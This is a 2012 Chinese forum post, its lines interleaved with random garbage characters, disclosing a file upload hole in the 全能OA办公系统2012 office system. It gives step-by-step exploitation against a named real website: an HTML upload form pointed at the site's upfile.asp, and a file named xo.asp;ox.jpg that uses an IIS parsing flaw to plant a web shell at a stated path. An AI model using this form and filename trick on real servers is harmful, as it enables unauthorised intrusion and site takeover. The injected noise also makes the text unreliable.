全能OA办公系统 上传漏洞
9 r4 b) G* v& o" R; F& H5 w5 e4 ]1 Q" Y+ V6 N9 B7 V& \& L
系统介绍:9 }. E2 w- D$ F; I
/ I8 k' s$ a6 `
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。& f6 [2 o$ I- J3 C0 n- [; a
# r6 V: ^+ m" w' r% _7 W; Z& b
主要功能:# `( S6 k) t% q% `" g# g
公司通告
* t0 e0 B, C+ W; F! ^工作计划
2 R$ f5 N) g! {: q$ e通讯助理 # N+ H7 c# U* q! X5 O* A
客户资源 8 s1 Q" g! A) c0 u6 d
我的公文
/ e7 i% ?' A4 y% B- Y) N. a公文传阅
; W Q6 H$ a+ l8 R! Y公共资源 ! C9 M" {8 X; e. ~+ y' o$ R, f3 C
资源预约 2 @4 D! g8 k$ l, |: ?' k
今日考勤
* d3 A2 J; r5 X0 D个人计划 ) ~! j+ ?, R% T( K1 V3 d
个人通讯录
7 P& I; s! `0 u* u1 {' D: E% y个人基本档案
9 U! a1 \9 r0 e未读邮件
q7 z+ K; u2 Q/ W) I* u4 t8 h- c发邮件
& f7 I% b2 g( K% [+ n- o0 U收件夹
: d3 c$ I1 l1 A* w4 G寄件夹 [+ m8 U! c" t5 y
网络硬盘
- U3 {! e- z9 U" F# m1 S/ `网络会议 / V3 A8 ~& _0 d2 z
网络调查 * G2 b- f3 G* B
交流论坛6 }) v, M6 A( u" D0 ]0 p! |4 f
' G8 y* N+ H4 _' u, g. U有兴趣测试的朋友可以下源码看看
" L5 i* X; o! } Y ?; c1 {0 \' p8 g, B7 p. u
源码下载:1 A0 n0 r* D. f I A; y
5 y' W" ?+ e; r
http://www.mycodes.net/30/4750.htm
! [6 I+ Q( ~$ ~, N. q; y2 G( p9 |
漏洞介绍:
) W/ A* k2 M/ F. d; ?/ P: |$ @
1 b2 A0 V( D. T- b! {) J1 D" k; z由upfile.asp上传文件漏洞引起* Z8 h3 F) J1 W5 ^+ Q4 v; j# w$ c7 j3 i
5 I( G% C/ ?- I( }
测试方法:2 ]0 O' ^( D1 n6 ^8 M2 e, d/ K: r0 C
2 P8 I' M2 ^; l! v使用名小子上传http://www.itlynn.com/upfile.asp即可: h* U! f3 K. d
1 u% B! S( X. h, H
如果upfile.asp文件被删除不存在。5 k# k6 [- N4 b: L& l
+ D8 e. K8 d" W) T) Y 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。# H. g' M- b* g9 x$ B6 \
, z' B. Z! L9 ]; ~2 }6 X% {& Z
如果存在那么将如下代码保存为upfile.html。/ p! U! j/ V' M" ?
8 V$ j' v& `/ @% S7 X; D
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。 V; N8 N2 x% W' C/ ^2 f+ `
* j9 Y) P `- {
. Q+ v, {9 D( b, w8 k. z( J( R% d0 x' b% T; L/ j7 { V
01 <table border='0' align="center" cellpadding="5"> / J+ }. H* |) |" I
. V) K4 X$ P8 v; T. F
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 3 [2 ^. P: S, I4 I
* K* d/ B" o7 ]% G" L03 <tr>
% I( C0 s1 t: j" ?5 C2 H6 j( W. K! v# \; J3 n! d" q- O
04 <td>报错:</td>
$ R) z. Z2 @ P1 P( w
0 Y! v, @% J' u: |6 H+ s05 <td><input type='radio' name='errnumber' value='0'> " \4 W% n! q& X, ?- g( e
4 U( x+ N8 ^! l' { _+ l
06 自动更名 * V- f4 a( _, x- D) @$ [7 R; U
! E1 n7 E% d% C; }( m07 <input type='radio' name='errnumber' value='1' checked> 9 [. E' k: I1 p
& p+ M4 j& {; ~6 f08 报错方式
: C! K. @7 N* v2 I8 G* @. G5 f5 D/ d( O- T: X
09 <input type='radio' name='errnumber' value='2'>
9 S% ~- d% S0 h, T& N6 f3 M: T. B+ s8 n4 {8 q% |
10 直接覆盖</td> * ]' e' A+ c- {
! K: B0 b0 u/ a* w' y0 {0 b11 </tr> . u" G- k' }0 K: @ m$ j! J
4 d- M. e' M, X3 n! v, k r12 <tr>
' [8 P( Y- p$ f' Q
8 i8 Y" R7 n/ V6 r13 <td>主题:</td> % O# M5 X" V4 H: a/ T
# Y1 B& }2 P- G& ^" }
14 <td><input type='text' name='filename' size='30'></td> + w" _& r7 P& y
! J6 r+ T) j6 n/ c& [. \- ~$ |
15 </tr>
7 H; l, _ d( ]& \* D" X/ L( h# N
16 <tr> ) L8 A0 y% V" \5 Z0 {8 P1 ]
' f* |( J' E) U' e& d) [
17 <td>文件:</td> 7 T( l# e( a# P
. C& N8 N9 R/ v. h4 F/ N: ]
18 <td><input type="file"name="fruit"size="30"></td>
( p$ y0 N2 c' A I" k8 ]6 v, [: m E) B0 E7 }3 j* a
19 </tr> . H* `' Q) b+ I7 Y
% `! L' c1 n2 F0 y5 }0 `' {
20 <tr>
* U4 U8 h' r+ B/ | S- a- O0 j/ r/ {& F' |' z; }# R ]
21 <td valign='top'>简介:</td>
5 y) L% D) I9 a8 O* G% Z" ~* U4 D7 N$ d1 G8 {& b' B
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
: g+ f) P. }( H9 \- D* I8 f) u. S8 ]% R- z* x4 C, c& y
23 </tr>
: V; P) }; Q( ], Z: P8 N4 W/ _* J, S* ?
24
2 a, s8 |( j, G
! Q. K# L7 j( K) ^25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> ) O# B1 N, T+ d6 e+ ?3 |/ |
; a% _* h, Q/ C' l3 E% J0 V
26 </tr>
8 I7 [. D& w5 n- M f" n d) d3 C, P3 I E; L. N
27 </form>
, @ K( W. G3 s _: A4 K$ E; {! l4 ]8 M( M% v( C
然后打开上传一个文件名为xo.asp;ox.jpg的文件。" d t1 N1 ^6 X
. q+ z4 p' L) e
) H/ H! m8 |) _( T! v \3 e# ~; j) B# ]8 @( |/ L+ _% o
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg! E% S+ q6 @( H: y& e
a3 c; d) |0 O2 |) x; Z此漏洞需要配合解析漏洞利用。
" i4 J0 R4 O! s- K- M6 D# r1 K; y) C8 ?. d
|
发表于 2012-11-21 13:45:12
收藏
支持
反对